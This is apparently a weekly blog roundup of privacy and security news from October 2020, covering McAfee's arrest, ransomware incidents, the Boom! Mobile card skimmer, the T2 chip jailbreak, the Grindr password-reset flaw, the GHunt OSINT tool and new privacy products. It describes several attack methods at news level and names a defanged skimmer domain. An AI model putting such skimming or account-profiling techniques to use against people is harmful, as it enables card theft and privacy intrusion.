Hey everyone! Welcome to the Privacy and Security related news for the week ending October 6th 2020
From the Wild and crazy guy John McAfee (We’ve met him. We can attest to the “crazy” parts) all the way to Mars, we have you covered with the latest and truly the greatest news.
We know you are going to love this week’s privacy and security news story round up and perhaps even forgive us for the last socially very distanced article.
Stay on point, on guard and informed. Read the article or download the podcast.
…And now our first story:
ES: John McAfee Arrested in Spain and Charged With US Tax Evasion.
An English-American businessman, computer programmer, and political activist, John McAfee founded cybersecurity firm McAfee Associates in 1987 and ran it until 1994. In 2010, the company was sold to Intel.
McAfee has had a contentious association with the law for years, though it’s at times unclear which run-ins are real and what has been fabricated. A former 2020 US Presidential candidate for the Libertarian Party (yes, really), he claimed that the campaign was “in exile” after he was charged with “using Crypto Cuttencies [sic] in criminal acts against the U. S. Government” in January 2019. In that same video, he said he hasn’t paid taxes in eight years. (That will matter later.) He also claimed the CIA had “attempted to collect us” in a July 2019 tweet with a photo of him on a boat holding a gun, part of an adventure that ended in his arrest and release in the Dominican Republic.
A June 15 indictment that was unsealed on Monday alleges that McAfee willfully failed to file tax returns between 2014 and 2018, although he earned millions from “promoting cryptocurrencies, consulting work, speaking engagements, and selling the rights to his life story for a documentary.”
To evade tax liability, the indictment says, McAfee directed the income into the bank accounts and crypto-exchange accounts of nominees. Furthermore, he allegedly concealed assets such as real estate, a yacht, and a vehicle.
The SEC also wants to have McAfee barred from serving as a public company officer and director.
We loved Robert Woods advice in Forbes with the 7 lessons learned from John McAfee.
1). Report your income and always file. (US citizens always have to file even if dual nationals and making pennies).
2). Be accurate too. False filing is a US felony.
3). Transparency is good, secrecy is bad.
4). Don’t obstruct the IRS.
5). Don’t be willful.
6). Report foreign accounts and assets too.
7). Watch Your Lifestyle.
UN International Maritime Organization says it was hacked
A number of IMO’s web-based services became unavailable on Wednesday 30 September. The systems impacted included the IMO public website and other web-based services. The interruption of web-based services was caused by a sophisticated cyber-attack against the Organization’s IT systems that overcame robust security measures in place.
IMO has ISO/IEC 27001:2013 certification for its information security management system. (So it shows they make an effort as far as security goes.)
The IMO Headquarters file servers are located in the UK, with extensive backup systems in Geneva. The backup and restore system is regularly tested.
Following the attack the Secretariat shut down key systems to prevent further damage from the attack.
Service to the website was restored Friday with other services coming up as soon as it is safe to do so.
Insurance firm Ardonagh Group disabled 200 admin accounts as ransomware infection took hold
Gareth Corfield: Ardonagh spokeswoman Kelly-Ann Knight stated, “The incident was identified as a result of the routine comprehensive monitoring we have in place. We immediately took all necessary action including taking impacted systems offline and have implemented our business continuity plans in the impacted business units, to minimize disruption to our customers. We are working with third-party forensic and IT experts to manage the situation and are in the process of carrying out remedial action.”
Sources said that IT access within the firm has been patchy as internal crisis response teams, along with third-party responders, scrambled to halt the ransomware.
FR: Privacy: Five bar and cafe owners arrested in France for running no-log WiFi networks
Catalin Cimpanu: In one of the weirdest arrests of the year, at least five bar and cafe managers from the French city of Grenoble were taken into custody last week for running open WiFi networks at their establishments and not keeping logs of past connected users.
The bar and cafe owners were arrested for allegedly breaking a 14-year-old French law that dictates that all internet service providers must keep logs on all their users for at least one year.
Nonetheless, French media pointed out that the law’s text didn’t only apply to internet service providers (ISPs) in the broad meaning of the word — as in telecommunications providers — but also to any “persons” who provide internet access, may it be free of charge or via password-protected networks.
The bar and cafe owners were eventually released after questioning.
According to French law number 2006-64, they now risk up to one year in prison, a personal fine of up to €75,000, and a business fine of up to €375,000.
US: Boom! Hacked page on mobile phone website is stealing customers’ card data
Dan Goodin / ARS Technica: If you’re in the market for a new mobile phone plan, it’s best to avoid turning to Boom! Mobile. That is, unless you don’t mind your sensitive payment card data being sent to criminals in an attack that remained ongoing in the last few hours.
According to researchers from security firm Malwarebytes, Boom! Mobile’s boom.us website is infected with a malicious script that skims payment card data and sends it to a server under the control of a criminal group researchers have dubbed Fullz House. The malicious script is called by a single line that comprises mostly nonsense characters when viewed with the human eye.
When decoded from Base64 format, the line translates to: paypal-debit[.]com/cdn/ga.js. The JavaScript code ga.js masquerades as a Google Analytics script at one of the many fraudulent domains operated by Fullz House members. “From a network traffic point of view, you can see each leak as a single GET request where the data is Base64 encoded.”
People considering buying a new phone plan should steer clear of Boom!, at least until the skimmer script is removed.
Boom! representatives didn’t respond to messages seeking comment for this post.
Has the Apple T2 security chip been jailbroken?
If exploited correctly, the Checkra1n 0.11.0. jailbreaking technique allows users/attackers to gain full control over their devices to modify core OS behavior or be used to retrieve sensitive or encrypted data, and even plant malware.
Code is run in the security chip during boot up and that, combined with Checkm8 and Blackbird jailbreaking apps allows access. “Apple left a debugging interface open in the T2 security chip shipping to customers, allowing anyone to enter Device Firmware Update (DFU) mode without authentication. Using this method, it is possible to create a USB-C cable that can automatically exploit your macOS device on boot.”
This allows access to encrypted data on the device. Our advice. Don’t leave your phone unattended and if you misplace it do a remote data wipe ASAP.
New Ransomware family: Egregor
Just what we needed, a new class of ransomware, and this one has already been seen at a dozen different companies. It contains anti-analysis techniques such as code obfuscation and packed payloads. In one of its execution stages the payload can only be decrypted if the proper key is entered in the process’s command line. This means the file can’t be analyzed unless someone enters the same command line used to run the payload.
Egregor’s ransom note promises that if the ransom is not paid within three days, the attackers will leak part of the stolen data and alert the victim company’s partners and clients via mass media so they know of the breach.
If ransom is paid, Egregor’s operators claim they will decrypt the files and provide recommendations for securing the company’s network to avoid future attacks, “acting as some sort of black hat pentest team.”
Hmmnn…
What is Golden?
The intelligent knowledge base.
“Explore the world’s first self-constructing knowledge database built by artificial and human intelligence.”
Golden is a company that wants to ‘map all human knowledge’, and it just raised $14.5 million in a Series A from Andreessen Horowitz, DCVC, and Gigafund.
I tested it to see what it knew about Digital Asset Holdings and it did find Yuval Rooz as the CEO.
Watch this space…
Privacy: Want to check your public gmail associated persona? This may help.
GHunt is an OSINT tool to extract information from a Google Account using an email.
It can currently extract:
Owner’s name
Last time the profile was edited
Google ID
If the account is a Hangouts Bot
Activated Google services (YouTube, Photos, Maps, News360, Hangouts, etc.)
Possible YouTube channel
Possible other usernames
Public photos
Phone models
Phone firmwares
Installed software
Google Maps reviews
Possible physical location
So if you have data floating around, this may provide insight into it and allow you an opportunity to tidy it up.
Facebook is opening its experimental predictions app to all users
Facebook isn’t exactly known for balanced conversations or reliable information, but that’s not stopping it from launching Forecast, a “community for crowdsourced predictions and collective insights.” Forecast will let users ask questions and predict the outcomes. For instance, who will win the 2020 election? Or, will we have a COVID-19 vaccine anytime soon?
Though, for a platform riddled with misinformation, there’s reason to be skeptical. It doesn’t help that the predictions boil down to a binary choice, and there’s speculation that the predictions could reinforce existing beliefs or influence real-world outcomes.
We are on the fence with this one.
Privacy: Kaleido’s Unscreen is dead simple drag-and-drop background removal for video
Devin Coldewey: Removing the background of a video you’ve shot can be a real pain if you don’t have the kind of tools and setup used by professionals — and even then it isn’t as easy as it should be. Kaleido’s one-step background removal tool for images, remove.bg, has graduated to full-motion video with the company’s new product, Unscreen.
The service itself is simple enough. You drag a video onto the Unscreen webpage, and a few minutes later (depending on the size and resolution of the content) you get it back, with everything gone but the person or object in the foreground.
Tested on a five-minute, 720p video of a woman with long hair, and it finished in about 45 minutes. The end result was good, with the hair nicely preserved and only a handful of small glitches that would be easy to paint out if desired.
One thing Kaleido has been careful to demonstrate — and it’s sad to think that this is a differentiator — is that its products work with people whose skin tone and hair confound other solutions. The bare fact that some background removal processes work better with light-skinned people than dark-skinned, or with straight hair than curly, is a sad indicator of a lack of diversity in the training set that produced those tools.
Kaleido’s Bernhard Holzer told me that this was top of mind from the beginning, and that the team has been careful to assemble training data from all over the world to make sure the product works equally well no matter which country or hemisphere the user is in.
Code-hosting website GitHub is rolling out Code Scanning for both paid and free accounts.
To configure Code Scanning, users must visit the “Security” tab of each of the repositories they want the feature to be enabled.
Once vulnerabilities are detected, Code Scanning works by prompting the developer to revise their code.
After months of telling the world there was no breach, it appears BlackBaud had a breach.
BlackBaud the cloud CRM provider filed an 8-k form with the US Securities and Exchange commission on September 29 2020. The disclosure states: “the cybercriminal may have accessed some unencrypted fields intended for bank account information, social security numbers, usernames and/or passwords.”
“We expect our Security Incident investigation and security enhancements to continue for the foreseeable future.”
Hacking Grindr Accounts with Copy and Paste
To reset a password, Grindr sends the user an email with a clickable link containing an account password reset token. Once clicked, the user can change their password and is allowed back into their account.
But Wassime Bouimadaghene, a French security researcher, found that Grindr’s password reset page was leaking password reset tokens to the browser. That meant anyone could trigger the password reset who had knowledge of a user’s registered email address, and collect the password reset token from the browser if they knew where to look.
A couple of years ago it made headlines when Grindr was found to be sending HIV status off to third parties and given the sensitivity of this data, rightly so. This, along with many of the other fields above, is what makes it so sensational that the data was so trivially accessible by anyone who could exploit this simple flaw.
The real issue was that for 5 or 6 days, neither Wassime nor Troy Hunt (who Wassime reached out to) got a response, so Troy tweeted about it. From that point the responses were exemplary with the issue fixed forthwith.
With API attacks rising, Cloudflare launches a free API security tool
By Catalin Cimpanu: Named the Cloudflare API Shield, this new service will be available for free for all Cloudflare account holders, regardless of pricing plan.
APIs, or Application Programming Interfaces, are exactly what their name says they are — interfaces between different applications. The work by receiving instructions or queries from a “client” and performing a pre-defined action.
Cloudflare’s new API Shield works by using a “deny-all” security policy, which the company calls “positive security.”
Once configured for an API server, the API Shield will deny all incoming connections if they don’t provide a cryptographic certificate and key that the API owner has generated in the API Shield dashboard and installed on all approved client devices, may them be mobile apps, IoT devices, web servers, or others.
Working with encryption and certificates sounds complicated, but Cloudflare says this is why it created API Shield in the first place, as a place to automate all these operations as part of a web dashboard.
“We’ll initially support [API] JSON traffic and, based on customer feedback, we will consider extending schema protection to binary protocols, such as gRPC,” Cloudflare said in a press release.
Planned features include rate limiting, DDoS protection, web application rules specifically designed for APIs, and API analytics.
Google intros a couple of useful privacy tools for Android phones.
New feature: “verified calls”
Businesses call millions of consumers every day, but many consumers don’t answer calls unless they recognize the caller. Calls from unverified phone numbers can also cause stress as scam call rates increase.
When participating businesses place calls, Verified Calls establishes trust by confirming the identity of the businesses in real-time so users can be confident that calls aren’t spoofed. Users receive enhanced experiences with the caller business name and logo, verification badge, and the reason for the calling, setting the ground for a successful engagement.
Similar to how Verified Calls enhances calling experiences, Verified SMS makes SMS messaging safer and more trustworthy by adding sender verification and branding to business SMS messages.
Many brands—like 1-800-Flowers, Kayak, SoFi and Google Pay—are already sending messages with Verified SMS, and more businesses are signing up to use Verified SMS every day.
(You get a "verified sender badge, business name and logo and link preview)
New feature: “Hold for Me”
Sarah Perez: In the short demo of “Hold for Me,” Google showed how a Pixel device owner is able to activate the new feature after they’ve been placed on hold. This is done by tapping a new button that appears on the phone screen above the buttons for muting the call, turning on speakerphone, and the other in-call phone controls.
Once activated, you’re alerted with a message that says “Don’t hang up,” where you’re advised that Google Assistant is listening to the call for you, so you can do other things.
If the party on the other end of the call were to return, they would not hear what you were doing until you resumed the call.
A button is also available on this screen that lets you tap to return to the call at any time, and below that an on-screen message says “music playing” to indicate if the Google Assistant is still hearing the hold music. Real-time captions will appear if there is talking taking place on the line. This is powered by Google’s natural language understanding, the company says.
You can also choose to press the red hang up button to end the call from this screen.
When a person comes on the line, the device will alert you it’s time to return to the call.
At a time when people are waiting on hold for hours for help with COVID-19 related government assistance, like unemployment benefits, a “Hold for Me” option could be more than a useful new feature — it could be a literal lifesaver for those in the middle of a financial crisis due to job loss.
Google says the new feature will come to its new Pixel 5 devices, which will soon be followed by its older-generation Pixel phones via the next “Pixel feature drop” roll out.
Privacy: Amazon One—a new “innovation” to make everyday activities "effortless"
Dilip Kumar: customers can use Amazon One as an entry option at two of our Amazon Go stores in Seattle—our original Amazon Go store at 7th & Blanchard as well as our store in South Lake Union at 300 Boren Ave. North.
It takes less than a minute to sign up at these Amazon Go stores using an Amazon One device. The first step is to insert your credit card. Next, hover your palm over the device and follow the prompts to associate that card with the unique palm signature being built for you by our computer vision technology in real time. You’ll have the option to enroll with just one palm or both. And that’s it—you’re now signed up. Once you’re enrolled, to use Amazon One to enter these Amazon Go stores, you’ll just hold your palm above the Amazon One device at entry for about a second or so.
We also plan to offer the service to third parties like retailers, stadiums, and office buildings so that more people can benefit from this ease and convenience in more places.
Why did you create Amazon One?
As with everything Amazon does, we started with the customer experience and worked backwards. We solved for things that are durable and have stood the test of time but often cause friction or wasted time for customers. We wondered whether we could help improve experiences like paying at checkout, presenting a loyalty card, entering a location like a stadium, or even badging into work. So, we built Amazon One to offer just that—a quick, reliable, and secure way for people to identify themselves or authorize a transaction while moving seamlessly through their day.
Why did you pick palm recognition?
We selected palm recognition for a few important reasons. One reason was that palm recognition is considered more private than some biometric alternatives because you can’t determine a person’s identity by looking at an image of their palm. It also requires someone to make an intentional gesture by holding their palm over the device to use. And it’s contactless, which we think customers will appreciate, especially in current times. Ultimately, using a palm as a biometric identifier puts customers in control of when and where they use the service.
Is an Amazon account required?
We designed the signup experience to be fast and lightweight, and you don’t need an Amazon account to sign up or start using Amazon One—just a mobile phone number and credit card. But if you choose to use your Amazon account with Amazon One, you can log in on our website to securely manage your information and see your usage history.
What is the device actually scanning when it creates my unique palm signature?
When you hold your palm over the Amazon One device, the technology evaluates multiple aspects of your palm. No two palms are alike, so we analyze all these aspects with our vision technology and select the most distinct identifiers on your palm to create your palm signature.
How do you protect customer data?
At Amazon, nothing is more important to us than earning and maintaining customer trust. We take data security and privacy seriously, and any sensitive data is treated in accordance with our long-standing policies. With this in mind, we designed Amazon One to be highly secure. For example, the Amazon One device is protected by multiple security controls and palm images are never stored on the Amazon One device. Rather, the images are encrypted and sent to a highly secure area we custom-built in the cloud where we create your palm signature.
If I decide I don’t want to use Amazon One any more after signing up, can I delete my biometric data?
Yes, you can request to delete data associated with Amazon One through the device itself or via the online customer portal.
…forgive us for wondering how long until the database of palm prints is hacked. 
and our last story is neither security or privacy unless you really stretch the definition of privacy
In the midst of social distancing, Mars Is The Closest to Earth It’ll Be For Another 15 Years
JACINTA BOWLER: Very soon, Mars is not just going to be close to our hearts, but also nearest to our actual planet - a mere 62.1 million kilometers (38.6 million miles) away from Earth.
This is the closest it’ll be for the next 15 years. And it means that stargazing is highly recommended as Mars will be bright, big and easy to see with or without a telescope.
We’d recommend checking out a sky chart to work out where Mars will be in the night sky in your location so you can plan for the best viewing.
And that’s it for this week DAML’ers! Stay safe and secure!